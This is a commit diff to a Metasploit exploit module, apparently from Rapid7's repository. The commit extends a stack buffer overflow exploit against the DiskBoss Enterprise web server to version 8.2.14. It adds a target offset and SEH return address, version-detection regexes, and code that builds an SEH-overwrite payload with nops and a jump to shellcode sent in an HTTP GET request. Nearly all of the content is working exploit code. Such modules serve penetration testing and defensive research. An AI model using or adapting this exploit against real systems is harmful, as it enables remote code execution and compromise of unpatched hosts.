Land #9268, Update DiskBoss Module (EDB 42395)

rapid7 · Dec 28, 2017 · e614e9b · e614e9b
2 parents 5e71be7 + 604b949
commit e614e9b
Showing 1 changed file with 35 additions and 10 deletions.
diff --git a/modules/exploits/windows/http/diskboss_get_bof.rb b/modules/exploits/windows/http/diskboss_get_bof.rb
@@ -14,20 +14,23 @@ def initialize(info = {})
       'Name'           => 'DiskBoss Enterprise GET Buffer Overflow',
       'Description'    => %q{
           This module exploits a stack-based buffer overflow vulnerability
-        in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28,
+        in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,
         caused by improper bounds checking of the request path in HTTP GET
         requests sent to the built-in web server. This module has been
         tested successfully on Windows XP SP3 and Windows 7 SP1.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'vportal',      # Vulnerability discovery and PoC
-          'Gabor Seljan'  # Metasploit module
+          'vportal',        # Vulnerability discovery and PoC
+          'Ahmad Mahfouz',  # Vulnerability discovery and PoC
+          'Gabor Seljan',   # Metasploit module
+          'Jacob Robles'    # Metasploit module
         ],
       'References'     =>
         [
-          ['EDB', '40869']
+          ['EDB', '40869'],
+          ['EDB', '42395']
         ],
       'DefaultOptions' =>
         {
@@ -60,6 +63,13 @@ def initialize(info = {})
               'Offset' => 2471,
               'Ret'    => 0x100461da  # ADD ESP,0x68 # RETN [libpal.dll]
             }
+          ],
+          [
+            'DiskBoss Enterprise v8.2.14',
+            {
+              'Offset' => 2496,
+              'Ret'    => 0x1002A8CA  # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]
+            }
           ]
         ],
       'Privileged'     => true,
@@ -74,7 +84,7 @@ def check
     )
 
     if res && res.code == 200
-      if res.body =~ /DiskBoss Enterprise v7\.(4\.28|5\.12)/
+      if res.body =~ /DiskBoss Enterprise v(7\.4\.28|7\.5\.12|8\.2\.14)/
         return Exploit::CheckCode::Vulnerable
       elsif res.body =~ /DiskBoss Enterprise/
         return Exploit::CheckCode::Detected
@@ -105,6 +115,8 @@ def exploit
           mytarget = targets[1]
         elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
           mytarget = targets[2]
+        elsif res.body =~ /DiskBoss Enterprise v8\.2\.14/
+          mytarget = targets[3]
         end
       end
 
@@ -115,11 +127,24 @@ def exploit
       print_status("Selected Target: #{mytarget.name}")
     end
 
-    sploit =  make_nops(21)
-    sploit << payload.encoded
-    sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
-    sploit << [mytarget.ret].pack('V')
-    sploit << rand_text_alpha(2500)
+    case mytarget
+    when targets[1], targets[2]
+      sploit =  make_nops(21)
+      sploit << payload.encoded
+      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
+      sploit << [mytarget.ret].pack('V')
+      sploit << rand_text_alpha(2500)
+    when targets[3]
+      seh = generate_seh_record(mytarget.ret)
+      sploit = payload.encoded
+      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
+      sploit[sploit.length, seh.length] = seh
+      sploit <<  make_nops(10)
+      sploit << Rex::Arch::X86.jmp(0xffffbf25)   # JMP to ShellCode
+      sploit << rand_text_alpha(5000 - sploit.length)
+    else
+      fail_with(Failure::NoTarget, 'No matching target')
+    end
 
     send_request_cgi(
       'method' => 'GET',